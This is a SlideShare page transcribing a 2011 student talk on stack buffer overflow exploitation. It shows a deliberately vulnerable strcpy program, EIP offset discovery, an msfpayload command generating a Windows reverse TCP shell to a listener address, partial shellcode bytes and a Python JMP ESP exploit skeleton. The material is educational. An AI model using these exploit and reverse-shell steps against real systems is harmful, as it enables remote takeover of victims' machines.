• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
smash the stack , Menna Essa
 

smash the stack , Menna Essa

on

  • 952 views

twentyCAT event 14/5/2011

twentyCAT event 14/5/2011

Statistics

Views

Total Views
952
Views on SlideShare
952
Embed Views
0

Actions

Likes
1
Downloads
13
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    smash the stack , Menna Essa smash the stack , Menna Essa Presentation Transcript

    • Smash The Stack! By: @MennaEssa FCIS Student , 2nd year.
    • Agenda Theory Steps : 1­Find a bug 2­verify the bug 3­Finalize and use  the shell code View from above Exploit development ?
    • What is ? Buffer ? Buffer over flow ? Smash the stack ? So the theory is ==>
    • The Theory:#include <string.h>void do_something(char *Buffer){ char MyVar[128]; strcpy(MyVar,Buffer);}int main (int argc, char **argv){ do_something(argv[1]);}
    • Step1 : Find the bug Got the source code? Awesome! No?   Reversing (Fuzzing)  Simply , you can keep giving the  program inputs of an increasing  sizes until it crashes.
    • Step2 : Verify the bug  Where is the EIP ?  Use a debugger to guide your self   Used different inputs to limit the range  of your expectations.  Use unique patterns to find exactly  where the file is    “./pattern_create.rb  <size>“  /pattern_offset.rb <Data written in EIP>  <Size>  Youve got the EIP... Sweet!
    • Now what? No that you have the EIP you should  be able to overwrite it with an  address where you have your evil <no? > code. We call this the shell code. a shellcode is a small piece of code  used as the payload in the  exploitation of a software  vulnerability Ok...WHERE!
    • Where? Remeber when you overwrote your  EIP ? Why not use the rest of the  buffer to put it there? right  where the ESP is pointing EIP ==> ESP “DMA nope!” Use a jump op. From one of the  dlls ..   Google some resources for that ;)
    • Get the shell code Now you control the EIP , now  where to put your shell code ./msfpayload  windows/shell/reverse_tcp  LHOST=192.168.1.112 C
    • Greet the shell code :)unsigned char buf[] ="xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2""xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85""xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3""x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"….....x0fxdfxe0xffxd5x97x6a""x05x68xc0xa8x01x70x68x02x00x11x5cx89xe6x6ax10""x56x57x68x99xa5x74x61xffxd5x85xc0x74x0cxffx4e""x08x75xecx68xf0xb5xa2x56xffxd5x6ax00x6ax04x56""x57x68x02xd9xc8x5fxffxd5x8bx36x6ax40x68x00x10""x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6a""x00x56x53x57x68x02xd9xc8x5fxffxd5x01xc3x29xc6""x85xf6x75xecxc3";
    • Finalize:
    • Finalize:#!/usr/bin/env pythonbuff = ‘A’ *26072buff += ‘x3axf2xa8x01′ # EIP overwrite #JMP ESP address.buff += ‘CCCC’ # 4 bytes of garbagebuff += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""x31xc0xacx3c.....” #your shellcodef= open(some_file, ‘w’) #whatever how this will be an input to a programf.write(buff)f.close()
    • Now Add it to your code and youre done Winamp remote buffer overflow exploitlive demo.[this flaw is triggered when a audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser]
    • The look from above... Exploit development , security  researchers the need to exist  more here :) Remember to know how  You can find some neat tutorials  on isecurity , corelanec0d3r 
    • ~# Thanks_